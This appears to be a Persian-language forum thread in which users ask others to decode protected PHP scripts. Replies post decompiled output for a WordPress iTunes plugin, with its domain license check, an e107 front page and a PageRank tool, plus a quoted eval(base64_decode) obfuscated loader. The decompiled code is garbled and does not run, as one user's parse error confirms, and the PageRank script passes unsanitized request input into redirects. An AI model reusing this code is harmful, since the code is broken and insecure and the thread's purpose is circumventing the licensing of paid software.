    if ( $$gixbfldy['results'][0]['trackName'] )
    {
    update_post_meta( $$GLOBALS['ryctutdv'], "itunes-title", $$GLOBALS['modxwy']['results'][0]['trackName'] );
    }
    if ( $$GLOBALS['modxwy']['results'][0]['primaryGenreName'] )
    {
    update_post_meta( $$GLOBALS['ryctutdv'], "itunes-category", $$GLOBALS['modxwy']['results'][0]['primaryGenreName'] );
    }
    if ( $$GLOBALS['modxwy']['results'][0]['languageCodesISO2A'] )
    {
    $GLOBALS['jufffse'] = "result";
    $$GLOBALS['iikuotawj'] = $$GLOBALS['jufffse']['results'][0]['languageCodesISO2A'];
    $$GLOBALS['iikuotawj'] = implode( "|", $$GLOBALS['iikuotawj'] );
    $GLOBALS['kmkesqyvjweh'] = "lang";
    update_post_meta( $$GLOBALS['ryctutdv'], "itunes-ipad-languages", $$GLOBALS['kmkesqyvjweh'] );
    }
    if ( $$oqeewvcmer['results'][0]['fileSizeBytes'] )
    {
    update_post_meta( $$GLOBALS['ryctutdv'], "size", $$GLOBALS['modxwy']['results'][0]['fileSizeBytes'] );
    }
    $GLOBALS['heyrudedx'] = "post_ID";
    if ( $$GLOBALS['modxwy']['results'][0]['averageUserRating'] )
    {
    update_post_meta( $$GLOBALS['hquakh'], "itunes-rating", $$GLOBALS['modxwy']['results'][0]['averageUserRating'] );
    }
    $GLOBALS['sguupcvskkf'] = "result";
    if ( $$GLOBALS['ruljurzudddt']['results'][0]['userRatingCount'] )
    {
    update_post_meta( $$GLOBALS['heyrudedx'], "itunes-rating-count", $$GLOBALS['sguupcvskkf']['results'][0]['userRatingCount'] );
    }
    }
    }
    if ( isset( $_POST['itunes-url'] ) )
    {
    update_post_meta( $$GLOBALS['ryctutdv'], "itunes", $_POST['itunes-url'] );
    }
    }

    function formatSizeUnits( $bytes )
    {
    $vztkqldx = "bytes";
    if ( 1073741824 <= $$vztkqldx )
    {
    $GLOBALS['xcjavhkulr'] = "bytes";
    $uueulypq = "bytes";
    $$GLOBALS['xcjavhkulr'] = number_format( $$uueulypq / 1073741824, 2 )." GB";
    }
    else if ( 1048576 <= $$GLOBALS['upripmof'] )
    {
    $$GLOBALS['upripmof'] = number_format( $$GLOBALS['upripmof'] / 1048576, 2 )." MB";
    }
    else if ( 1024 <= $$GLOBALS['upripmof'] )
    {
    $GLOBALS['xduehqjirhd'] = "bytes";
    $$GLOBALS['xduehqjirhd'] = number_format( $$GLOBALS['upripmof'] / 1024, 2 )." KB";
    }
    else if ( 1 < $$GLOBALS['upripmof'] )
    {
    $GLOBALS['jpbrtkdg'] = "bytes";
    $$GLOBALS['jpbrtkdg'] = $$GLOBALS['upripmof']." bytes";
    }
    else if ( $$GLOBALS['upripmof'] == 1 )
    {
    $$GLOBALS['upripmof'] = $$GLOBALS['upripmof']." byte";
    }
    else
    {
    $$GLOBALS['upripmof'] = "0 bytes";
    }
    return $$GLOBALS['upripmof'];
    }

    $GLOBALS['uoodpxy'] = "url";
    $GLOBALS['ryctutdv'] = "post_ID";
    $GLOBALS['fywdoxssdos'] = "values";
    $GLOBALS['fjozszodwoh'] = "json";
    $GLOBALS['upripmof'] = "bytes";
    $GLOBALS['iikuotawj'] = "lang";
    $GLOBALS['oovymkcscq'] = "scr";
    $GLOBALS['modxwy'] = "result";
    if ( get_bloginfo( "url" ) != "http://www.appleapps.ir/" && get_bloginfo( "url" ) != "http://www.appleapps.ir" && get_bloginfo( "url" ) != "http://appleapps.ir/" && get_bloginfo( "url" ) != "http://appleapps.ir" )
    {
    wp_die( Plugin license is invalid! );
    exit( 0 );
    }
    add_action( "add_meta_boxes", "itunes_field_box" );
    add_action( "save_post", "itunes_field_save" );
    ?>

  14. #14

    نقل قول: دیکد پی اچ پی

    سلام دوستان . خواهشا یکی اینو هم دی کد کنه.

    index k.zip

  15. #15

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط sanesta مشاهده تاپیک
    سلام دوستان . خواهشا یکی اینو هم دی کد کنه.

    index k.zip
    البته ممکنه یه سری مشکل توش باش که اگه برنامه نویسی بلد باشی میشه رفعش کرد

    <?php
    require_once( "class2.php" );
    if ( file_exists( "index_include.php" ) )
    {
    include( "index_include.php" );
    }
    if ( !( $pref['frontpage'] ) && $Var_192 != "Array" )
    {
    if ( !$pref['frontpage'] || $pref['frontpage'] == "Array.php" )
    {
    $up_pref = "news.php";
    }
    else if ( $pref['frontpage'] == "links" )
    {
    $up_pref = $PLUGINS_DIRECTORY."links_page/links.php";
    }
    else if ( $pref['frontpage'] == "forum" )
    {
    $up_pref = $PLUGINS_DIRECTORY."forum/forum.php";
    }
    else if ( is_numeric( $pref['frontpage'] ) )
    {
    $up_pref = $PLUGINS_DIRECTORY."content/content.php?content.".$pref['frontpage'];
    }
    else if ( substr( $pref['frontpage'], 0 - 1 ) != "/" && strpos( $pref['frontpage'], "." ) === FALSE )
    {
    $up_pref = $pref['frontpage'].".php";
    }
    else
    {
    $up_pref = $pref['frontpage'];
    }
    $pref['frontpage']['all'] = $up_pref;
    save_prefs( );
    }
    $query = e_QUERY && e_QUERY != "" && !$_GET['elan'] ? "?".e_QUERY : "";
    if ( $pref['membersonly_enabled'] && !USER )
    {
    header( "location: ".e_LOGIN );
    exit( );
    }
    else if ( $Tmp_90 && $pref['frontpage']['all'] )
    {
    $location = ( strpos( $pref['frontpage']['all'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['all'].$query;
    }
    else if ( ADMIN )
    {
    $location = ( strpos( $pref['frontpage']['254'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['254'].$query;
    }
    else
    {
    if ( USER )
    {
    require_once( e_HANDLER."userclass_class.php" );
    $class_list = get_userclass_list( );
    foreach ( $Var_3240 as $fp_class )
    {
    $inclass = false;
    if ( !$inclass && check_class( $fp_class['userclass_id'] ) )
    {
    $location = ( strpos( $pref['frontpage'][$fp_class['userclass_id']], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage'][$fp_class['userclass_id']].$query;
    $inclass = true;
    }
    }
    $location = $location ? $location : ( strpos( $pref['frontpage']['253'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['253'].$query;
    }
    else
    {
    $location = ( strpos( $pref['frontpage']['252'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['252'].$query;
    }
    }
    if ( isset( $pref['frontpage_method'] ) && $pref['frontpage_method'] == "include" )
    {
    if ( $location == "news.php" )
    {
    require_once( "news.php" );
    }
    else
    {
    if ( $location == PLUGINS_DIRECTORY."forum/forum.php" )
    {
    require_once( $PLUGINS_DIRECTORY."forum/forum.php" );
    }
    else
    {
    if ( preg_match( "/^page\\.php\\?([0-9]*)$/", $location ) )
    {
    $e_QUERY = preg_match( "/^page\\.php\\?([0-9]*)$/", $location );
    require_once( "page.php" );
    }
    else
    {
    header( "Location: {$location}" );
    exit( );
    }
    }
    }
    }
    else
    {
    $str = explode( "?", $location."?" )[1];
    $page = explode( "?", $location."?" )[0];
    if ( $page == "index.php" )
    {
    require_once( HEADERF );
    require_once( FOOTERF );
    exit( );
    }
    else if ( $page != "index.php" )
    {
    header( "Location: {$location}" );
    }
    exit( );
    }
    ?>

  16. #16

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط mehdiv مشاهده تاپیک
    البته ممکنه یه سری مشکل توش باش که اگه برنامه نویسی بلد باشی میشه رفعش کرد

    <?php
    require_once( "class2.php" );
    if ( file_exists( "index_include.php" ) )
    {
    include( "index_include.php" );
    }
    if ( !( $pref['frontpage'] ) && $Var_192 != "Array" )
    {
    if ( !$pref['frontpage'] || $pref['frontpage'] == "Array.php" )
    {
    $up_pref = "news.php";
    }
    else if ( $pref['frontpage'] == "links" )
    {
    $up_pref = $PLUGINS_DIRECTORY."links_page/links.php";
    }
    else if ( $pref['frontpage'] == "forum" )
    {
    $up_pref = $PLUGINS_DIRECTORY."forum/forum.php";
    }
    else if ( is_numeric( $pref['frontpage'] ) )
    {
    $up_pref = $PLUGINS_DIRECTORY."content/content.php?content.".$pref['frontpage'];
    }
    else if ( substr( $pref['frontpage'], 0 - 1 ) != "/" && strpos( $pref['frontpage'], "." ) === FALSE )
    {
    $up_pref = $pref['frontpage'].".php";
    }
    else
    {
    $up_pref = $pref['frontpage'];
    }
    $pref['frontpage']['all'] = $up_pref;
    save_prefs( );
    }
    $query = e_QUERY && e_QUERY != "" && !$_GET['elan'] ? "?".e_QUERY : "";
    if ( $pref['membersonly_enabled'] && !USER )
    {
    header( "location: ".e_LOGIN );
    exit( );
    }
    else if ( $Tmp_90 && $pref['frontpage']['all'] )
    {
    $location = ( strpos( $pref['frontpage']['all'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['all'].$query;
    }
    else if ( ADMIN )
    {
    $location = ( strpos( $pref['frontpage']['254'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['254'].$query;
    }
    else
    {
    if ( USER )
    {
    require_once( e_HANDLER."userclass_class.php" );
    $class_list = get_userclass_list( );
    foreach ( $Var_3240 as $fp_class )
    {
    $inclass = false;
    if ( !$inclass && check_class( $fp_class['userclass_id'] ) )
    {
    $location = ( strpos( $pref['frontpage'][$fp_class['userclass_id']], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage'][$fp_class['userclass_id']].$query;
    $inclass = true;
    }
    }
    $location = $location ? $location : ( strpos( $pref['frontpage']['253'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['253'].$query;
    }
    else
    {
    $location = ( strpos( $pref['frontpage']['252'], "http" ) === FALSE ? e_BASE : "" ).$pref['frontpage']['252'].$query;
    }
    }
    if ( isset( $pref['frontpage_method'] ) && $pref['frontpage_method'] == "include" )
    {
    if ( $location == "news.php" )
    {
    require_once( "news.php" );
    }
    else
    {
    if ( $location == PLUGINS_DIRECTORY."forum/forum.php" )
    {
    require_once( $PLUGINS_DIRECTORY."forum/forum.php" );
    }
    else
    {
    if ( preg_match( "/^page\\.php\\?([0-9]*)$/", $location ) )
    {
    $e_QUERY = preg_match( "/^page\\.php\\?([0-9]*)$/", $location );
    require_once( "page.php" );
    }
    else
    {
    header( "Location: {$location}" );
    exit( );
    }
    }
    }
    }
    else
    {
    $str = explode( "?", $location."?" )[1];
    $page = explode( "?", $location."?" )[0];
    if ( $page == "index.php" )
    {
    require_once( HEADERF );
    require_once( FOOTERF );
    exit( );
    }
    else if ( $page != "index.php" )
    {
    header( "Location: {$location}" );
    }
    exit( );
    }
    ?>
    ممنون داداش . ولی من برنامه نویسی بلد نیستم .
    الان این ارور رو داده
    Parse error: syntax error, unexpected '[' in /home/ustoolsi/public_html/adz/index.php on line 101

    مشکل کجاست؟

  17. #17

    نقل قول: دیکد پی اچ پی

    استادان عزیز لطفا این فایل پی اچ پی رو هم اینکد کنید من کاری نتونتسم بکنم :

    cp.rar

  18. #18

    نقل قول: دیکد پی اچ پی

    این فایل شما مستقل نیست و به یکسری فایلهای دیگه متصله. باید کل فایلهاش رو بگذارین تا بشه دیکد کرد.

  19. #19

    نقل قول: دیکد پی اچ پی

    با تشکر از استاد عزیز که پاسخ دادند

    این اسکریپت هستش :

    دانلود اسکریپت


    رمز عبور : websoftdownload.com


    فایل های زیر این کد شده اند :


    /usercpi.php
    /user.php
    /register.php
    /index.php
    /header.php
    /footer.php
    /commenting/index.php

    استاد بزرگوار اگه فرصت و حوصله داشتید لطف کنید و این بخش ها رو برای من دی کد کنید .

    پیشاپیش مننونم

  20. #20

    نقل قول: دیکد پی اچ پی

    فایل موجود نبود. نتونستم دانلود کنم. لطفاً یه جای دیگه آپلود کنید.

  21. #21
    کاربر دائمی
    تاریخ عضویت
    شهریور 1389
    محل زندگی
    جنوب عشق است
    پست
    1,557

    نقل قول: دیکد پی اچ پی

    جناب شهرکی
    توی شرکت که پروژه میگیرین انجام میدین
    در نهایت که سورس کد رو تحویل مشتری نمیدین درسته ؟
    اگه نمیدین
    میخواستم ببینم با چه نرم افزاری برنامه هارو کد میکنین
    بهترین نرم افزار برای محافظت از کدها چیه ؟

  22. #22

    نقل قول: دیکد پی اچ پی

    ما سورس کد رو تحویل میدیم. این چیزها زیاد مهم نیست. سورس کد به تنهایی بدرد نمیخوره. مهم خلاقیتی هست که به تولید اون کد منتهی شده. برای مثال، اگه نیازها تغییر کنه، باز هم به ما احتیاج پیدا میکنن. درهرحال ما توی شرکت اصلاً به سورس کدمون حساس نیستیم. البته نه اینکه پخشش کنیم ولی از کارفرما هم پنهانش نمیکنیم.

  23. #23
    کاربر دائمی
    تاریخ عضویت
    شهریور 1389
    محل زندگی
    جنوب عشق است
    پست
    1,557

    نقل قول: دیکد پی اچ پی

    و اما اگر بخوایم از کدها محافظت کنیم
    چه نرم افزاری توصیه میکنین ؟

  24. #24

    نقل قول: دیکد پی اچ پی

    راستشو بخواین از هیچکدوم استفاده نکردم و هیچکدوم رو هم توصیه نمیکنم. کلاً با اینجور کارها مخالفم. توی دنیای Open Source این چیزا دیگه معنایی نداره.

  25. #25

    نقل قول: دیکد پی اچ پی

    استاد عزیز ممنون که به درخواست بنده هم توجه دارید

    این لیک دانلود :

    http://uploadboy.com/y5m3u2wzu6ms.html

    لطف می کنید اگه وقت گرانبهاتون رو برای اینکار بزارید .

    باز هم ممنون

  26. #26

    نقل قول: دیکد پی اچ پی

    یکی از استادان عزیز لطف کنند به کار منم رسیدگی کنند

    ممنون

  27. #27

    نقل قول: دیکد پی اچ پی

    خودم دی کد کردم :D

    ممنون از همه

  28. #28
    کاربر جدید
    تاریخ عضویت
    مرداد 1384
    محل زندگی
    اهواز
    پست
    8

    نقل قول: دیکد پی اچ پی

    با سلام
    من یک سوال داشتم من یه فایل لایسنس دارم که درون اون فقط یکسری کد هست .
    میخواستم بدونم اولا چطوری میشه تشخیص داد با چی کد شده
    و چطوری میشه اون رو دیکد کرد.
    نمونه کد
    ------ LICENSE FILE DATA -------
    52139511oWqXwbHvdWrNg65Ozo4ZWePi
    eILpt+edjIvI63AE0kOAlyrxInH8r5kf
    ysklVgUifrARxa5TiTRyfFfKWieYMPjw
    XKUMz0hhKgzpsgdiTxsc0p9POf/9nVvT
    36PawnmIi8iAngK5yz/W3V1jo+IcvM50

  29. #29
    کاربر تازه وارد
    تاریخ عضویت
    اردیبهشت 1385
    پست
    62

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط soltanshop مشاهده تاپیک
    با سلام خدمت دوستان
    بنده هم یک کد دارم کسی می تونه دیکد کنه
    <?php

    $o="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 awODk=";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZT Y0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpS ZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbG xsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxs PTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3 hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDsk bGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbG xsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JH eHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbG xsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxs bGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbG xsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxs bGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbG xsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxs bGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbG xsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9 KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3 IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxb JGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbG xsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxs bGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbG xsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRs bGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JG xsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxs bGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPS RsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7 JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2 JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtl dmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SX VKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxs bGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbG xsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytd XjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3 hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hz YkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw =="));return;?>
    <?php
    if( $website ){
    if( !strstr($website,"http://") && !strstr($website,"https://") ){
    $website = "http://".$website;
    }
    }
    $website = $_REQUEST['url'];
    $s = $_REQUEST['s'];
    if (!isset($website)){
    header("Location: http://www.383.ir");
    die();
    }
    if ($s > 41 or $s < 1){
    header("Location: http://www.383.ir");
    die();
    }
    if( $website ){
    if( !strstr($website,"http://") && !strstr($website,"https://") ){
    $website = "http://".$website;
    }
    }
    $tempurl=$website;
    $pieces = explode("\n", $tempurl); // finding all submitted url
    $size=sizeof($pieces); // array size to use in the for loop at the end of program
    //settings - host and user agent
    $googlehost='toolbarqueries.google.com';
    $googleua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5';

    //convert a string to a 32-bit integer
    function StrToNum($Str, $Check, $Magic) {
    $Int32Unit = 4294967296; // 2^32

    $length = strlen($Str);
    for ($i = 0; $i < $length; $i++) {
    $Check *= $Magic;
    //If the float is beyond the boundaries of integer (usually +/- 2.15e+9 = 2^31),
    // the result of converting to integer is undefined
    // refer to http://www.php.net/manual/en/language.types.integer.php
    if ($Check >= $Int32Unit) {
    $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
    //if the check less than -2^31
    $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
    }
    $Check += ord($Str{$i});
    }
    return $Check;
    }

    //genearate a hash for a url
    function HashURL($String) {
    $Check1 = StrToNum($String, 0x1505, 0x21);
    $Check2 = StrToNum($String, 0, 0x1003F);

    $Check1 >>= 2;
    $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
    $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
    $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

    $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
    $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

    return ($T1 | $T2);
    }

    //genearate a checksum for the hash string
    function CheckHash($Hashnum) {
    $CheckByte = 0;
    $Flag = 0;

    $HashStr = sprintf('%u', $Hashnum) ;
    $length = strlen($HashStr);

    for ($i = $length - 1; $i >= 0; $i --) {
    $Re = $HashStr{$i};
    if (1 === ($Flag % 2)) {
    $Re += $Re;
    $Re = (int)($Re / 10) + ($Re % 10);
    }
    $CheckByte += $Re;
    $Flag ++;
    }

    $CheckByte %= 10;
    if (0 !== $CheckByte) {
    $CheckByte = 10 - $CheckByte;
    if (1 === ($Flag % 2) ) {
    if (1 === ($CheckByte % 2)) {
    $CheckByte += 9;
    }
    $CheckByte >>= 1;
    }
    }

    return '7'.$CheckByte.$HashStr;
    }

    //return the pagerank checksum hash
    function getch($url) { return CheckHash(HashURL($url)); }

    //return the pagerank figure
    function getpr($url) {
    global $googlehost,$googleua;
    $ch = getch($url);
    $fp = fsockopen($googlehost, 80, $errno, $errstr, 30);
    if ($fp) {
    $out = "GET /tbr?client=navclient-auto&ch=$ch&features=Rank&q=info:$url HTTP/1.1\r\n";
    //echo "<pre>$out</pre>\n"; //debug only
    $out .= "User-Agent: $googleua\r\n";
    $out .= "Host: $googlehost\r\n";
    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);

    //$pagerank = substr(fgets($fp, 128), 4); //debug only
    //echo $pagerank; //debug only
    while (!feof($fp)) {
    $data = fgets($fp, 128);
    //echo $data;
    $pos = strpos($data, "Rank_");
    if($pos === false){} else{
    $pr=substr($data, $pos + 9);
    $pr=trim($pr);
    $pr=str_replace("\n",'',$pr);
    return $pr;
    }
    }
    //else { echo "$errstr ($errno)<br />\n"; } //debug only
    fclose($fp);
    }
    }

    //generate the graphical pagerank
    function pagerank($url,$width=40,$method='style') {
    if (!preg_match('/^(http:\/\/)?([^\/]+)/i', $url)) { $url='http://'.$url; }
    $pr=getpr($url);

    return $pr;
    }

    // for loop for finding pagerank of multple url
    for ($j=0; $j<$size; $j++)
    {

    $pr = pagerank($pieces[$j]);
    if ( $pr == "0" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "1" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "2" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "3" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "4" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "5" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
